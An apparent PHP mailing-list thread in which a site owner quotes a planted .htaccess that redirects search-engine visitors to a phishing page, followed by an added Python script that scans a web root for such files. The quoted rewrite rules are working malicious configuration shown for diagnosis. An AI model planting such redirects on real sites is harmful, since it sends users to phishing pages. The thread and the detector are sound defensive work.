The hack puts this .htaccess in dozens of dirs
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /StartLocs/maps/kapicag/ex3/t.htm [L]
#
a995d2cc661fa72452472e9554b5520c
The kapicag/ex3/t.htm appears to be a phishing site.
mike wrote:
How was it "hacked"?
That will help determine what kind of exploit might have been used.
On 4/11/08, Al <news@xxxxxxxxxxxxx> wrote:
One of my sites has been hacked and I'm trying to find the hole. The hack
code creates dirs with "nobody" ownership, so it's obvious stuff is not via
ftp [ownership would be foo]
--
PHP General Mailing List (http://www.php.net/)
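For locating every copy of a planted file like the one quoted in this thread, the sketch below walks a document root and flags any .htaccess that combines a search-engine referer condition with a catch-all RewriteRule, also noting whether the file's owner differs from the site account. It is an added example, not code from anyone in the thread; the heuristics, function names, sample files and the /placeholder/landing.htm target are assumptions constructed for illustration.

```python
import os, re, tempfile

# Heuristics derived from the .htaccess quoted in this thread (an assumption,
# not a complete signature): a referer condition naming search engines plus a
# catch-all RewriteRule. Matching is file-wide so wrapped directives still hit.
COND_REFERER = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I | re.M)
SEARCH_ENGINES = re.compile(r"\b(google|yahoo|msn|yandex)\b", re.I)
CATCH_ALL = re.compile(r"^\s*RewriteRule\s+\^?\.\*\$?\s+(\S+)", re.I | re.M)

def inspect_htaccess(path, expected_uid):
    """Return a finding dict if the file looks like the referer redirect, else None."""
    with open(path, errors="replace") as fh:
        text = fh.read()
    rule = CATCH_ALL.search(text)
    if not (rule and COND_REFERER.search(text) and SEARCH_ENGINES.search(text)):
        return None
    st = os.stat(path)
    return {"path": path, "target": rule.group(1), "uid": st.st_uid,
            "foreign_owner": st.st_uid != expected_uid}

def scan(root, expected_uid):
    """Walk root and inspect every .htaccess; expected_uid is the site owner's uid."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            hit = inspect_htaccess(os.path.join(dirpath, ".htaccess"), expected_uid)
            if hit:
                hits.append(hit)
    return hits

def demo():
    """Constructed sample tree: one hotlink-protection file, one planted-style file."""
    benign = ("RewriteEngine On\n"
              "RewriteCond %{HTTP_REFERER} !^http://example\\.test/ [NC]\n"
              "RewriteRule \\.(jpg|png)$ - [F]\n")
    planted = ("RewriteEngine On\n"
               "RewriteCond %{HTTP_REFERER}\n"
               "^http://([a-z0-9_\\-]+\\.)*(google|msn|yahoo)\\.\n[NC]\n"
               "RewriteRule ^.*$ /placeholder/landing.htm [L]\n")
    with tempfile.TemporaryDirectory() as root:
        for sub, body in (("images", benign), ("uploads", planted)):
            os.makedirs(os.path.join(root, sub))
            with open(os.path.join(root, sub, ".htaccess"), "w") as fh:
                fh.write(body)
        hits = scan(root, expected_uid=os.getuid())
        return [dict(h, path=os.path.relpath(h["path"], root)) for h in hits]

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a real host, call scan() with the document root and the uid of the site's own account; a hit with foreign_owner set corresponds to the "nobody"-owned files described in the thread.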